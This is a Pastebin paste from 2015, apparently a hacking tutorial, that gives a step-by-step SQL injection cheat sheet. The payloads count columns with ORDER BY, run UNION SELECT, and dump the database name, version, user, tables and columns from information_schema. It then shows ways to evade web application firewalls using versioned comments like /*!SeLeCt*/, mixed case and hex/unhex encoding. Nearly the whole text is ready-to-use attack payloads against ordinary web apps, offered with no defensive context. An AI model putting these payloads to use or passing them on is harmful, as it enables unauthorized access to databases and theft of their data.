API tools faq
paste
Advertisement
YASSINOXTN

bypass sql injection waf

YASSINOXTN
Jun 7th, 2015
1,502
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 4.07 KB | None | 0 0
raw download clone embed print report
  1. for more exclusive hacking tutorials visit : http://bit.ly/1Mfv5G3
  2. ==============================
  3. SqL Injection Commad
  4. ==============================
  5. Get Columns Number
  6. ==============================
  7. +order+by+
  8. ==============================
  9. get infected column
  10. ==============================
  11. +union+select+
  12. ==============================
  13. Get database name
  14. ==============================
  15. Database()
  16. ==============================
  17. Get database version
  18. ==============================
  19. Version()
  20. ==============================
  21. get database user
  22. User()
  23. ==============================
  24. get all tables
  25. ==============================
  26. Place this command on the infected collum
  27. ==============================
  28. group_concat(table_name)
  29. ==============================
  30. place this command on the final of the url
  31. ==============================
  32. +from+information_schema.tables+where+table_schema =database()--
  33. ==============================
  34. get all columns
  35. ==============================
  36. Place this command on the infected collum
  37. ==============================
  38. group_concat(column_name)
  39. ==============================
  40. place this one on the final of the link
  41. ==============================
  42. +from+information_schema.columns+where+table_schem a=database()--
  43. ==============================
  44. Bypass WAD
  45. ==============================
  46. Union Select WAF bypass
  47. ==============================
  48. Add this filter
  49. ==============================
  50. /*! */
  51. ==============================
  52. to
  53. ==============================
  54. select
  55. ==============================
  56. to be
  57. ==============================
  58. /*!select*/
  59. ==============================
  60. if it was not successfully change this
  61. ==============================
  62. select
  63. ==============================
  64. to
  65. ==============================
  66. /*!SeLeCt*/
  67. ==============================
  68. Capital and small letters
  69. ==============================
  70. Bypass WAF when getting tables
  71. ==============================
  72. Change this
  73. ==============================
  74. select
  75. ==============================
  76. to this
  77. ==============================
  78. /*!SeLeCt*/
  79. ==============================
  80. and this
  81. ==============================
  82. group_concat(table_name)
  83. ==============================
  84. to this
  85. ==============================
  86. /*!GrOuP_CoNcAT(table_name)*/
  87. ==============================
  88. and place this on the finish of the url
  89. ==============================
  90. +from+information_schema.tables+where+table_schema =database()--
  91. ==============================
  92. Bypass WAF when getting Columns
  93. ==============================
  94. change this
  95. ==============================
  96. select
  97. ==============================
  98. to this
  99. ==============================
  100. /*!SeLeCt*/
  101. ==============================
  102. change this
  103. ==============================
  104. group_concat(column_name)
  105. ==============================
  106. to this
  107. ==============================
  108. /*!GrOuP_CoNcAT(column_name)*/
  109. ==============================
  110. and place this on the final of the link
  111. ==============================
  112. +from+information_schema.columns+where+table_schem a=database()--
  113. ==============================
  114. to be like this
  115. ==============================
  116. +
  117. ==============================
  118. from+information_schema./*!columns*/+where+table_schema=database()--
  119. ==============================
  120. Additional command for waf bypass
  121. ==============================
  122. place this on the infected collumn
  123. ==============================
  124. concat(unhex(hex(concat(table_name,0x3a,column_nam e,0x3a,table_schema))))
  125. ==============================
  126. and place this on the finish of the link
  127. ==============================
  128. +from+information_schema.columns--
  129. ==============================
  130. columns number can't be shown ?
  131. ==============================
  132. add this
  133. ==============================
  134. +--+
  135. ==============================
  136. to the finish of the url
  137. ==============================
  138. and add this
  139. ==============================
  140. '
  141. ==============================
  142. after
  143. ==============================
  144. .php?id=1
  145. ==============================
  146. to be like this
  147. ==============================
  148. .php?id=1'
  149. ==============================
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!